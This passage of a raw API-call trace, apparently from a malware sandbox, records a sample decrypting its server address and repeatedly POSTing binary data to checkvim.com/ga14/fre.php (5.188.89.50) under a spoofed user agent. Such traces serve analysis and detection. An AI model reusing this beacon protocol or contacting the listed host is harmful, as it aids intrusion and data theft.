hHeap=0x840000, dwFlags=0x0, lpMem=0x86f930 | out: hHeap=0x840000) returned 1 [0255.299] closesocket (s=0x39c) returned 0 [0255.299] GetProcessHeap () returned 0x840000 [0255.299] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0255.299] GetProcessHeap () returned 0x840000 [0255.299] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0255.300] GetProcessHeap () returned 0x840000 [0255.300] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0255.300] GetProcessHeap () returned 0x840000 [0255.300] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0255.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xcfc) returned 0x39c [0255.303] Sleep (dwMilliseconds=0xea60) [0255.308] GetProcessHeap () returned 0x840000 [0255.308] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0255.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.309] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0255.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.319] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0255.327] GetProcessHeap () returned 0x840000 [0255.327] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0255.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.328] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0255.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.329] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0255.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.330] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.330] GetProcessHeap () returned 0x840000 [0255.330] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0255.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.336] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0255.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.337] CryptDestroyKey (hKey=0x87e570) returned 1 [0255.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.338] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0255.338] GetProcessHeap () returned 0x840000 [0255.338] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0255.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.339] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.340] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.341] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.343] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.343] GetProcessHeap () returned 0x840000 [0255.343] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0255.343] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0255.343] GetProcessHeap () returned 0x840000 [0255.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0255.344] GetProcessHeap () returned 0x840000 [0255.344] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0255.344] GetProcessHeap () returned 0x840000 [0255.344] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0255.344] GetProcessHeap () returned 0x840000 [0255.344] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0255.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.344] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0255.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.349] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0255.355] GetProcessHeap () returned 0x840000 [0255.355] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0255.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.356] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0255.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.357] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0255.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.358] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.358] GetProcessHeap () returned 0x840000 [0255.358] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0255.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.359] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0255.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.360] CryptDestroyKey (hKey=0x87e570) returned 1 [0255.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.360] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0255.360] GetProcessHeap () returned 0x840000 [0255.360] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0255.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.361] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0255.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.362] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0255.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.363] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0255.363] GetProcessHeap () returned 0x840000 [0255.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0255.363] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0255.365] GetProcessHeap () returned 0x840000 [0255.365] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0255.365] socket (af=2, type=1, protocol=6) returned 0x3a0 [0255.365] connect (s=0x3a0, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0255.453] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0255.453] GetProcessHeap () returned 0x840000 [0255.453] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0255.453] GetProcessHeap () returned 0x840000 [0255.453] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0255.454] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0255.455] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0255.455] GetProcessHeap () returned 0x840000 [0255.455] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0255.455] GetProcessHeap () returned 0x840000 [0255.455] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0255.455] GetProcessHeap () returned 0x840000 [0255.455] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0255.455] GetProcessHeap () returned 0x840000 [0255.455] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0255.456] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0255.457] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0255.457] GetProcessHeap () returned 0x840000 [0255.457] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0255.457] GetProcessHeap () returned 0x840000 [0255.458] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0255.458] send (s=0x3a0, buf=0x873a58*, len=237, flags=0) returned 237 [0255.458] send (s=0x3a0, buf=0x87eb58*, len=159, flags=0) returned 159 [0255.458] GetProcessHeap () returned 0x840000 [0255.458] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0255.458] recv (in: s=0x3a0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0255.862] GetProcessHeap () returned 0x840000 [0255.862] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0255.862] GetProcessHeap () returned 0x840000 [0255.862] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0255.863] GetProcessHeap () returned 0x840000 [0255.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0255.863] GetProcessHeap () returned 0x840000 [0255.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0255.863] closesocket (s=0x3a0) returned 0 [0255.863] GetProcessHeap () returned 0x840000 [0255.863] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0255.864] GetProcessHeap () returned 0x840000 [0255.864] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0255.864] GetProcessHeap () returned 0x840000 [0255.864] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0255.864] GetProcessHeap () returned 0x840000 [0255.864] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0255.873] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x41c) returned 0x3a0 [0255.875] Sleep (dwMilliseconds=0xea60) [0255.876] GetProcessHeap () returned 0x840000 [0255.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0255.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.877] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0255.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.908] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0255.917] GetProcessHeap () returned 0x840000 [0255.917] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0255.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.924] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0255.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.925] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0255.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.927] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.927] GetProcessHeap () returned 0x840000 [0255.927] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0255.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.928] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0255.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.929] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0255.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.930] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0255.931] GetProcessHeap () returned 0x840000 [0255.931] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0255.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.932] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.933] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.934] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.935] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.935] GetProcessHeap () returned 0x840000 [0255.935] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0255.935] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0255.935] GetProcessHeap () returned 0x840000 [0255.935] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0255.936] GetProcessHeap () returned 0x840000 [0255.936] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0255.936] GetProcessHeap () returned 0x840000 [0255.936] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0255.936] GetProcessHeap () returned 0x840000 [0255.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd40 [0255.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.937] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0255.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.943] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0255.949] GetProcessHeap () returned 0x840000 [0255.949] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0255.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.950] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0255.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.952] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0255.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.953] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.953] GetProcessHeap () returned 0x840000 [0255.953] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0255.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.954] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd40, pdwDataLen=0x19f9a4 | out: pbData=0x87fd40, pdwDataLen=0x19f9a4) returned 1 [0255.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.954] CryptDestroyKey (hKey=0x87e270) returned 1 [0255.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0255.955] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0255.955] GetProcessHeap () returned 0x840000 [0255.955] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0255.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.956] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0255.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.957] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0255.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0255.958] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0255.958] GetProcessHeap () returned 0x840000 [0255.958] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871290 [0255.958] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0255.960] GetProcessHeap () returned 0x840000 [0255.960] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0255.960] socket (af=2, type=1, protocol=6) returned 0x3a4 [0255.960] connect (s=0x3a4, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0256.033] FreeAddrInfoW (pAddrInfo=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0256.033] GetProcessHeap () returned 0x840000 [0256.033] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f820 [0256.033] GetProcessHeap () returned 0x840000 [0256.033] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0256.034] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0256.034] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0256.035] GetProcessHeap () returned 0x840000 [0256.035] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0256.035] GetProcessHeap () returned 0x840000 [0256.035] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0256.035] GetProcessHeap () returned 0x840000 [0256.035] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0256.035] GetProcessHeap () returned 0x840000 [0256.035] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0256.035] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0256.036] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0256.036] GetProcessHeap () returned 0x840000 [0256.036] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0256.036] GetProcessHeap () returned 0x840000 [0256.036] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0256.036] send (s=0x3a4, buf=0x873a58*, len=237, flags=0) returned 237 [0256.037] send (s=0x3a4, buf=0x87eb58*, len=159, flags=0) returned 159 [0256.037] GetProcessHeap () returned 0x840000 [0256.037] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0256.037] recv (in: s=0x3a4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0256.389] GetProcessHeap () returned 0x840000 [0256.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0256.390] GetProcessHeap () returned 0x840000 [0256.390] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0256.390] GetProcessHeap () returned 0x840000 [0256.390] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0256.390] GetProcessHeap () returned 0x840000 [0256.390] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f820 | out: hHeap=0x840000) returned 1 [0256.390] closesocket (s=0x3a4) returned 0 [0256.439] GetProcessHeap () returned 0x840000 [0256.439] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0256.439] GetProcessHeap () returned 0x840000 [0256.439] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0256.440] GetProcessHeap () returned 0x840000 [0256.440] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0256.440] GetProcessHeap () returned 0x840000 [0256.440] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871290 | out: hHeap=0x840000) returned 1 [0256.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x100c) returned 0x3a4 [0256.482] Sleep (dwMilliseconds=0xea60) [0256.487] GetProcessHeap () returned 0x840000 [0256.487] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0256.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.488] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0256.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.499] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0256.510] GetProcessHeap () returned 0x840000 [0256.510] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0256.511] 